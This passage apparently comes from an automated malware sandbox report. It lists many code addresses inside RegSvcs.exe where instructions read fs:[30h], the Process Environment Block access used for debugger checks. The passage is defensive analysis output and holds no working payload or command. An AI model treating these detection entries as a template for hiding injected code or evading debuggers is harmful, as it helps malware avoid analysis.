Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0165E75D mov eax, dword ptr fs:[00000030h]	9_2_0165E75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160C720 mov eax, dword ptr fs:[00000030h]	9_2_0160C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160C720 mov eax, dword ptr fs:[00000030h]	9_2_0160C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D0710 mov eax, dword ptr fs:[00000030h]	9_2_015D0710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164C730 mov eax, dword ptr fs:[00000030h]	9_2_0164C730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160273C mov eax, dword ptr fs:[00000030h]	9_2_0160273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160273C mov ecx, dword ptr fs:[00000030h]	9_2_0160273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160273C mov eax, dword ptr fs:[00000030h]	9_2_0160273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160C700 mov eax, dword ptr fs:[00000030h]	9_2_0160C700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01600710 mov eax, dword ptr fs:[00000030h]	9_2_01600710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0165E7E1 mov eax, dword ptr fs:[00000030h]	9_2_0165E7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160C7F0 mov eax, dword ptr fs:[00000030h]	9_2_0160C7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D47FB mov eax, dword ptr fs:[00000030h]	9_2_015D47FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D47FB mov eax, dword ptr fs:[00000030h]	9_2_015D47FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_016507C3 mov eax, dword ptr fs:[00000030h]	9_2_016507C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F27ED mov eax, dword ptr fs:[00000030h]	9_2_015F27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F27ED mov eax, dword ptr fs:[00000030h]	9_2_015F27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F27ED mov eax, dword ptr fs:[00000030h]	9_2_015F27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D07AF mov eax, dword ptr fs:[00000030h]	9_2_015D07AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160A660 mov eax, dword ptr fs:[00000030h]	9_2_0160A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160A660 mov eax, dword ptr fs:[00000030h]	9_2_0160A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01602674 mov eax, dword ptr fs:[00000030h]	9_2_01602674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015EC640 mov eax, dword ptr fs:[00000030h]	9_2_015EC640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E266C mov eax, dword ptr fs:[00000030h]	9_2_015E266C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01606620 mov eax, dword ptr fs:[00000030h]	9_2_01606620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01608620 mov eax, dword ptr fs:[00000030h]	9_2_01608620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164E609 mov eax, dword ptr fs:[00000030h]	9_2_0164E609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D262C mov eax, dword ptr fs:[00000030h]	9_2_015D262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01612619 mov eax, dword ptr fs:[00000030h]	9_2_01612619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015EE627 mov eax, dword ptr fs:[00000030h]	9_2_015EE627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_016506F1 mov eax, dword ptr fs:[00000030h]	9_2_016506F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_016506F1 mov eax, dword ptr fs:[00000030h]	9_2_016506F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164E6F2 mov eax, dword ptr fs:[00000030h]	9_2_0164E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164E6F2 mov eax, dword ptr fs:[00000030h]	9_2_0164E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164E6F2 mov eax, dword ptr fs:[00000030h]	9_2_0164E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164E6F2 mov eax, dword ptr fs:[00000030h]	9_2_0164E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160A6C7 mov ebx, dword ptr fs:[00000030h]	9_2_0160A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160A6C7 mov eax, dword ptr fs:[00000030h]	9_2_0160A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E26EB mov eax, dword ptr fs:[00000030h]	9_2_015E26EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E26EB mov eax, dword ptr fs:[00000030h]	9_2_015E26EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E26EB mov eax, dword ptr fs:[00000030h]	9_2_015E26EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E26EB mov eax, dword ptr fs:[00000030h]	9_2_015E26EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160C6A6 mov eax, dword ptr fs:[00000030h]	9_2_0160C6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D4690 mov eax, dword ptr fs:[00000030h]	9_2_015D4690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D4690 mov eax, dword ptr fs:[00000030h]	9_2_015D4690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_016066B0 mov eax, dword ptr fs:[00000030h]	9_2_016066B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160C68B mov eax, dword ptr fs:[00000030h]	9_2_0160C68B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0161096E mov eax, dword ptr fs:[00000030h]	9_2_0161096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0161096E mov edx, dword ptr fs:[00000030h]	9_2_0161096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0161096E mov eax, dword ptr fs:[00000030h]	9_2_0161096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0165C97C mov eax, dword ptr fs:[00000030h]	9_2_0165C97C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01650946 mov eax, dword ptr fs:[00000030h]	9_2_01650946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160A950 mov eax, dword ptr fs:[00000030h]	9_2_0160A950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F6962 mov eax, dword ptr fs:[00000030h]	9_2_015F6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F6962 mov eax, dword ptr fs:[00000030h]	9_2_015F6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F6962 mov eax, dword ptr fs:[00000030h]	9_2_015F6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015C8918 mov eax, dword ptr fs:[00000030h]	9_2_015C8918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015C8918 mov eax, dword ptr fs:[00000030h]	9_2_015C8918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0165892A mov eax, dword ptr fs:[00000030h]	9_2_0165892A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164E908 mov eax, dword ptr fs:[00000030h]	9_2_0164E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164E908 mov eax, dword ptr fs:[00000030h]	9_2_0164E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0165C912 mov eax, dword ptr fs:[00000030h]	9_2_0165C912
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0165E9E0 mov eax, dword ptr fs:[00000030h]	9_2_0165E9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DA9D0 mov eax, dword ptr fs:[00000030h]	9_2_015DA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DA9D0 mov eax, dword ptr fs:[00000030h]	9_2_015DA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DA9D0 mov eax, dword ptr fs:[00000030h]	9_2_015DA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DA9D0 mov eax, dword ptr fs:[00000030h]	9_2_015DA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DA9D0 mov eax, dword ptr fs:[00000030h]	9_2_015DA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DA9D0 mov eax, dword ptr fs:[00000030h]	9_2_015DA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_016029F9 mov eax, dword ptr fs:[00000030h]	9_2_016029F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_016029F9 mov eax, dword ptr fs:[00000030h]	9_2_016029F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_016049D0 mov eax, dword ptr fs:[00000030h]	9_2_016049D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_016589B3 mov esi, dword ptr fs:[00000030h]	9_2_016589B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_016589B3 mov eax, dword ptr fs:[00000030h]	9_2_016589B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_016589B3 mov eax, dword ptr fs:[00000030h]	9_2_016589B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D09AD mov eax, dword ptr fs:[00000030h]	9_2_015D09AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D09AD mov eax, dword ptr fs:[00000030h]	9_2_015D09AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D4859 mov eax, dword ptr fs:[00000030h]	9_2_015D4859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D4859 mov eax, dword ptr fs:[00000030h]	9_2_015D4859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0165E872 mov eax, dword ptr fs:[00000030h]	9_2_0165E872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0165E872 mov eax, dword ptr fs:[00000030h]	9_2_0165E872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01600854 mov eax, dword ptr fs:[00000030h]	9_2_01600854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160A830 mov eax, dword ptr fs:[00000030h]	9_2_0160A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F2835 mov eax, dword ptr fs:[00000030h]	9_2_015F2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F2835 mov eax, dword ptr fs:[00000030h]	9_2_015F2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F2835 mov eax, dword ptr fs:[00000030h]	9_2_015F2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F2835 mov ecx, dword ptr fs:[00000030h]	9_2_015F2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F2835 mov eax, dword ptr fs:[00000030h]	9_2_015F2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F2835 mov eax, dword ptr fs:[00000030h]	9_2_015F2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0165C810 mov eax, dword ptr fs:[00000030h]	9_2_0165C810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E28D0 mov ecx, dword ptr fs:[00000030h]	9_2_015E28D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160C8F9 mov eax, dword ptr fs:[00000030h]	9_2_0160C8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160C8F9 mov eax, dword ptr fs:[00000030h]	9_2_0160C8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FE8C0 mov eax, dword ptr fs:[00000030h]	9_2_015FE8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D28F0 mov eax, dword ptr fs:[00000030h]	9_2_015D28F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D28F0 mov eax, dword ptr fs:[00000030h]	9_2_015D28F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D28F0 mov eax, dword ptr fs:[00000030h]	9_2_015D28F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D28F0 mov eax, dword ptr fs:[00000030h]	9_2_015D28F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D28F0 mov eax, dword ptr fs:[00000030h]	9_2_015D28F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D28F0 mov eax, dword ptr fs:[00000030h]	9_2_015D28F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D0887 mov eax, dword ptr fs:[00000030h]	9_2_015D0887
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0165C89D mov eax, dword ptr fs:[00000030h]	9_2_0165C89D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015C8B50 mov eax, dword ptr fs:[00000030h]	9_2_015C8B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CCB7E mov eax, dword ptr fs:[00000030h]	9_2_015CCB7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E2B79 mov eax, dword ptr fs:[00000030h]	9_2_015E2B79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E2B79 mov eax, dword ptr fs:[00000030h]	9_2_015E2B79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E2B79 mov eax, dword ptr fs:[00000030h]	9_2_015E2B79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164EB1D mov eax, dword ptr fs:[00000030h]	9_2_0164EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164EB1D mov eax, dword ptr fs:[00000030h]	9_2_0164EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164EB1D mov eax, dword ptr fs:[00000030h]	9_2_0164EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164EB1D mov eax, dword ptr fs:[00000030h]	9_2_0164EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164EB1D mov eax, dword ptr fs:[00000030h]	9_2_0164EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164EB1D mov eax, dword ptr fs:[00000030h]	9_2_0164EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164EB1D mov eax, dword ptr fs:[00000030h]	9_2_0164EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164EB1D mov eax, dword ptr fs:[00000030h]	9_2_0164EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164EB1D mov eax, dword ptr fs:[00000030h]	9_2_0164EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FEB20 mov eax, dword ptr fs:[00000030h]	9_2_015FEB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FEB20 mov eax, dword ptr fs:[00000030h]	9_2_015FEB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D0BCD mov eax, dword ptr fs:[00000030h]	9_2_015D0BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D0BCD mov eax, dword ptr fs:[00000030h]	9_2_015D0BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D0BCD mov eax, dword ptr fs:[00000030h]	9_2_015D0BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01608BF0 mov ecx, dword ptr fs:[00000030h]	9_2_01608BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01608BF0 mov eax, dword ptr fs:[00000030h]	9_2_01608BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01608BF0 mov eax, dword ptr fs:[00000030h]	9_2_01608BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0165CBF0 mov eax, dword ptr fs:[00000030h]	9_2_0165CBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01632BF6 mov eax, dword ptr fs:[00000030h]	9_2_01632BF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FEBFC mov eax, dword ptr fs:[00000030h]	9_2_015FEBFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D8BF0 mov eax, dword ptr fs:[00000030h]	9_2_015D8BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D8BF0 mov eax, dword ptr fs:[00000030h]	9_2_015D8BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D8BF0 mov eax, dword ptr fs:[00000030h]	9_2_015D8BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0BBE mov eax, dword ptr fs:[00000030h]	9_2_015E0BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0BBE mov eax, dword ptr fs:[00000030h]	9_2_015E0BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0A5B mov eax, dword ptr fs:[00000030h]	9_2_015E0A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0A5B mov eax, dword ptr fs:[00000030h]	9_2_015E0A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D6A50 mov eax, dword ptr fs:[00000030h]	9_2_015D6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D6A50 mov eax, dword ptr fs:[00000030h]	9_2_015D6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D6A50 mov eax, dword ptr fs:[00000030h]	9_2_015D6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D6A50 mov eax, dword ptr fs:[00000030h]	9_2_015D6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D6A50 mov eax, dword ptr fs:[00000030h]	9_2_015D6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D6A50 mov eax, dword ptr fs:[00000030h]	9_2_015D6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D6A50 mov eax, dword ptr fs:[00000030h]	9_2_015D6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160CA6F mov eax, dword ptr fs:[00000030h]	9_2_0160CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160CA6F mov eax, dword ptr fs:[00000030h]	9_2_0160CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160CA6F mov eax, dword ptr fs:[00000030h]	9_2_0160CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164CA72 mov eax, dword ptr fs:[00000030h]	9_2_0164CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164CA72 mov eax, dword ptr fs:[00000030h]	9_2_0164CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E2A45 mov eax, dword ptr fs:[00000030h]	9_2_015E2A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E2A45 mov eax, dword ptr fs:[00000030h]	9_2_015E2A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E2A45 mov eax, dword ptr fs:[00000030h]	9_2_015E2A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01600A50 mov eax, dword ptr fs:[00000030h]	9_2_01600A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160CA24 mov eax, dword ptr fs:[00000030h]	9_2_0160CA24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160CA38 mov eax, dword ptr fs:[00000030h]	9_2_0160CA38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015C8A00 mov eax, dword ptr fs:[00000030h]	9_2_015C8A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015C8A00 mov eax, dword ptr fs:[00000030h]	9_2_015C8A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F4A35 mov eax, dword ptr fs:[00000030h]	9_2_015F4A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F4A35 mov eax, dword ptr fs:[00000030h]	9_2_015F4A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0165CA11 mov eax, dword ptr fs:[00000030h]	9_2_0165CA11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D0AD0 mov eax, dword ptr fs:[00000030h]	9_2_015D0AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160AAEE mov eax, dword ptr fs:[00000030h]	9_2_0160AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160AAEE mov eax, dword ptr fs:[00000030h]	9_2_0160AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01626ACC mov eax, dword ptr fs:[00000030h]	9_2_01626ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01626ACC mov eax, dword ptr fs:[00000030h]	9_2_01626ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01626ACC mov eax, dword ptr fs:[00000030h]	9_2_01626ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01604AD0 mov eax, dword ptr fs:[00000030h]	9_2_01604AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01604AD0 mov eax, dword ptr fs:[00000030h]	9_2_01604AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01626AA4 mov eax, dword ptr fs:[00000030h]	9_2_01626AA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CEA80 mov eax, dword ptr fs:[00000030h]	9_2_015CEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CEA80 mov eax, dword ptr fs:[00000030h]	9_2_015CEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DEA80 mov eax, dword ptr fs:[00000030h]	9_2_015DEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DEA80 mov eax, dword ptr fs:[00000030h]	9_2_015DEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DEA80 mov eax, dword ptr fs:[00000030h]	9_2_015DEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DEA80 mov eax, dword ptr fs:[00000030h]	9_2_015DEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DEA80 mov eax, dword ptr fs:[00000030h]	9_2_015DEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DEA80 mov eax, dword ptr fs:[00000030h]	9_2_015DEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DEA80 mov eax, dword ptr fs:[00000030h]	9_2_015DEA80
